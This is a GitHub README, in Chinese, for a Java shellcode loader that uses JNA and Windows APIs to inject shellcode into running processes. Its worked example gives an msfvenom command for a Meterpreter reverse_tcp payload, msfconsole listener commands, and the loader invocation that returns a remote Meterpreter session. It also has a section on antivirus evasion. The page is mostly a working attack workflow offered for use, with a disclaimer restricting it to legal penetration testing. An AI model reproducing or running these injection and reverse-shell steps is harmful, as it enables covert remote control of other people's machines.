Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

ddostest123/Java-Shellcode-Loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

2 Commits

Repository files navigation

Java ShellCode Loader

基于Java实现的ShellCode加载器,兼容32位及64位平台。

核心原理是利用Jna来调用Windows API,实现shellcode的注入。

运行环境:Jre >= 1.5

注:本项目已经内置在yzddmr6/As-Exploits的ShellCodeLoader模块中。

编译

当前版本使用的jna经过魔改,不支持maven编译。

需要使用idea的构建工件功能进行打包,具体方法请咨询百度。

使用

默认会随机注入32位进程,请使用32位的shellcode

java -jar ShellcodeLoader.jar shellcode_hex

注入x64位shellcode

java -jar ShellcodeLoader.jar --x64 shellcode_hex

举例

kali

生成hex格式的ShellCode

┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5xxxx

然后开启监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j

客户端

java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx

即可收到反弹的Meterpreter

免杀

image-20211205205857990

注意事项

本项目仅供合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则自行承担相关责任。

About

基于Java实现的Shellcode加载器

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%

AltStyle によって変換されたページ (->オリジナル) /